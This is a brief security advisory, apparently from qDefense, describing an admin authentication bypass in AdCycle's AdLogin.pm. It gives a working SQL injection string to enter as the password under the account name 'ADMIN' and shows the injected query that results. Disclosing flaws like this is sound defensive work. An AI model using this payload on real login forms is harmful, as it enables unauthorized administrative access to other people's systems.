AdCycle AdLogin.pm Admin Autentication Bypass Vulnerability
This example was submitted by qDefense Advisories <advisories@qDefense.com>:
If an attacker signs in, using a account name of "ADMIN" and a password of
X ' OR 1 #
an attacker can cause AdCycle to use the following SQL command:
"SELECT * FROM ad WHERE LOGIN='ADMIN' AND PASSWORD='X' OR 1 #'